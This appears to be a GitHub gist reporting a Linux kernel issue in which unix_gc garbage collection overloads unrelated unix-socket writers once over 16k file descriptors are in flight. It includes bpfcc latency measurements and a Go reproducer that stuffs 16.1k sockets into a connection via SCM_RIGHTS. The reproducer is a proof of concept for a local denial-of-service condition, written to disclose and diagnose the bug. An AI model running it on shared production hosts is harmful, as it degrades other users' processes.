Skip to content

Instantly share code, notes, and snippets.

@bobrik
Created October 19, 2023 22:18
Show Gist options
  • Save bobrik/82e5722261920c9f23d9402b88a0bb27 to your computer and use it in GitHub Desktop.
Save bobrik/82e5722261920c9f23d9402b88a0bb27 to your computer and use it in GitHub Desktop.
unix_gc overload

unix_gc overload

The issue

Linux kernel has a garbage collection mechanism for inflight unix sockets passed to other unix sockets. This mechanism can be used to cause excessive load onto well behaved processes that are using regular unix sockets without any fd passing, because garbage collection is called in the socket write path.

The repro

The attached reproduction code in Go can be used to illustrate this:

$ go build -o /tmp/derp main.go && /tmp/derp

What it does:

  1. Makes a unix connection to itself in a loop, writing some bytes and closing it every 50ms. This is the legitimate well behaving load.
  2. Makes a unix connection to itself and puts 16.1k unix sockets into it. This is what forces unix_gc to run a lot more for the well behaved connection that has nothing to do with this.

With fewer than 16k file descriptors inflight, there's some gc, but not much:

$ sudo funclatency-bpfcc -uTi 1 unix_gc
Tracing 1 functions for "unix_gc"... Hit Ctrl-C to end.

22:08:34
     usecs               : count     distribution
         0 -> 1          : 0        |                                        |
         2 -> 3          : 0        |                                        |
         4 -> 7          : 0        |                                        |
         8 -> 15         : 0        |                                        |
        16 -> 31         : 0        |                                        |
        32 -> 63         : 0        |                                        |
        64 -> 127        : 0        |                                        |
       128 -> 255        : 0        |                                        |
       256 -> 511        : 0        |                                        |
       512 -> 1023       : 2        |*****                                   |
      1024 -> 2047       : 12       |**********************************      |
      2048 -> 4095       : 14       |****************************************|
      4096 -> 8191       : 6        |*****************                       |

avg = 2535 usecs, total: 86194 usecs, count: 34

This is triggered from unix_release_sock as long as there are any inflight sockets present at all (no matter how many):

If you cross the threshold for the number of inflight sockets, it gets worse:

ivan@vm:~$ sudo funclatency-bpfcc -uTi 1 unix_gc
Tracing 1 functions for "unix_gc"... Hit Ctrl-C to end.

22:09:15
     usecs               : count     distribution
         0 -> 1          : 0        |                                        |
         2 -> 3          : 0        |                                        |
         4 -> 7          : 0        |                                        |
         8 -> 15         : 0        |                                        |
        16 -> 31         : 0        |                                        |
        32 -> 63         : 0        |                                        |
        64 -> 127        : 0        |                                        |
       128 -> 255        : 0        |                                        |
       256 -> 511        : 0        |                                        |
       512 -> 1023       : 456      |****************************************|
      1024 -> 2047       : 48       |****                                    |
      2048 -> 4095       : 2        |                                        |

avg = 979 usecs, total: 495498 usecs, count: 506

You can observe a lot more calls to unix_gc and a lot more work in each one. Most of the calls here are are from unix_stream_sendmsg:

Display the source blob
Display the rendered blob
Raw
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
package main
import (
"log"
"net"
"os"
"syscall"
"time"
)
const okayAddr = "/tmp/unix-gc-storm.okay.sock"
const churnAddr = "/tmp/unix-gc-storm.churn.sock"
const scmAddr = "/tmp/unix-gc-storm.scm.sock"
func startOkayListener() net.Listener {
os.Remove(okayAddr)
listener, err := net.Listen("unix", okayAddr)
if err != nil {
panic(err)
}
return listener
}
func churnSockets() {
os.Remove(churnAddr)
listener, err := net.Listen("unix", churnAddr)
if err != nil {
panic(err)
}
for {
client, err := net.Dial("unix", churnAddr)
if err != nil {
panic(err)
}
server, err := listener.Accept()
if err != nil {
panic(err)
}
for i := 0; i < 50; i++ {
_, err = client.Write([]byte("hiiii"))
if err != nil {
panic(err)
}
}
server.Close()
client.Close()
log.Println(".")
time.Sleep(time.Millisecond * 50)
}
}
func scm() net.Listener {
os.Remove(scmAddr)
listener, err := net.Listen("unix", scmAddr)
if err != nil {
panic(err)
}
scmConn, err := net.Dial("unix", scmAddr)
if err != nil {
panic(err)
}
scmConnFile, err := scmConn.(*net.UnixConn).File()
if err != nil {
panic(err)
}
// Use 159 for less load or 161 for more load.
// The difference here is crossing the threshold:
// * https://elixir.bootlin.com/linux/v6.1/source/net/unix/garbage.c#L198
//
// As long as there are more than 16k inflight sockets, unix_gc starts
// to run in the unix socket write path, causing a lot more load:
// * https://elixir.bootlin.com/linux/v6.1/source/net/unix/af_unix.c#L2158
//
// The load is applied to any socket, not just the offending one.
for i := 0; i < 161; i++ {
fds := []int{}
for i := 0; i < 100; i++ {
fd, err := syscall.Socket(syscall.AF_UNIX, syscall.SOCK_DGRAM, 0)
if err != nil {
panic(err)
}
fds = append(fds, fd)
}
rights := syscall.UnixRights(fds...)
err = syscall.Sendmsg(int(scmConnFile.Fd()), nil, rights, nil, 0)
if err != nil {
panic(err)
}
}
return listener
}
func main() {
okayListener := startOkayListener()
scmListener := scm()
churnSockets()
okayListener.Close()
scmListener.Close()
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment